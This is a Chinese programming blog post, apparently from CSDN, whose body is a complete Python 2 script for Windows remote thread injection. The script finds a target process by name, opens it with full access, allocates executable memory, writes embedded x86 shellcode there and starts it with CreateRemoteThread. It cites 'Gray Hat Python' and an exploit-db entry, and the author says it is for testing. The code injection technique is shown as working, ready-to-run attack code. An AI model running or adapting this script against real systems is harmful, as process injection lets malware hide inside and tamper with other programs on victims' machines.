python 远程线程注入代码

最新推荐文章于 2025-06-09 09:20:35 发布

`北极星

最新推荐文章于 2025-06-09 09:20:35 发布

阅读量7.8k

点赞数

CC 4.0 BY-SA版权

分类专栏：编程学习 python

本文链接：https://blog.csdn.net/chence19871/article/details/32718219

编程学习同时被 2 个专栏收录

140 篇文章

订阅专栏

python

17 篇文章

订阅专栏

本文介绍如何利用Python实现远程线程注入技术，通过获取目标进程ID并注入Shellcode来创建远程线程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

用python来实现远程线程注入，该例子是测试相关工作的。参数为要注入的进程的名字：

import sys
import ctypes
from ctypes import *

PAGE_EXECUTE_READWRITE         = 0x00000040
PROCESS_ALL_ACCESS =     ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM        =     ( 0x1000 | 0x2000 )

kernel32      = windll.kernel32
pName         = sys.argv[1]

if not sys.argv[1]:
    print "Code Injector: ./code_injector.py <name to inject>"
    sys.exit(0)

shellcode = \
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"\
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"\
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"\
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"\
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"\
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";



code_size     = len(shellcode)

TH32CS_SNAPPROCESS = 0x00000002
class PROCESSENTRY32(ctypes.Structure):
     _fields_ = [("dwSize", ctypes.c_ulong),
                 ("cntUsage", ctypes.c_ulong),
                 ("th32ProcessID", ctypes.c_ulong),
                 ("th32DefaultHeapID", ctypes.c_ulong),
                 ("th32ModuleID", ctypes.c_ulong),
                 ("cntThreads", ctypes.c_ulong),
                 ("th32ParentProcessID", ctypes.c_ulong),
                 ("pcPriClassBase", ctypes.c_ulong),
                 ("dwFlags", ctypes.c_ulong),
                 ("szExeFile", ctypes.c_char * 260)]

def getProcPid(procName):
    CreateToolhelp32Snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot
    Process32First = ctypes.windll.kernel32.Process32First
    Process32Next = ctypes.windll.kernel32.Process32Next
    CloseHandle = ctypes.windll.kernel32.CloseHandle
    
    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
    
    pe32 = PROCESSENTRY32()
    pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
    if Process32First(hProcessSnap,ctypes.byref(pe32)) == False:
        return
    if pe32.szExeFile == procName:
        CloseHandle(hProcessSnap)
        return pe32.th32ProcessID
    
    while True:
        #yield pe32 #save the pe32
        if Process32Next(hProcessSnap,ctypes.byref(pe32)) == False:
            break
        if pe32.szExeFile == procName:
            CloseHandle(hProcessSnap)
            return pe32.th32ProcessID
        
    CloseHandle(hProcessSnap)


procPid = getProcPid(pName)
print procPid

# Get a handle to the process we are injecting into.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, procPid )

if not h_process:

    print "[*] Couldn't acquire a handle to PID: %s" % pid
    sys.exit(0)

# Allocate some space for the shellcode
arg_address = kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)

# Write out the shellcode
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))

# Now we create the remote thread and point it's entry routine
# to be head of our shellcode
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):

    print "[*] Failed to inject process-killing shellcode. Exiting."
    sys.exit(0)

print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value

参考：

1. python 灰帽子

2. http://blog.csdn.net/chollima/article/details/7669522

3.http://www.exploit-db.com/exploits/28996/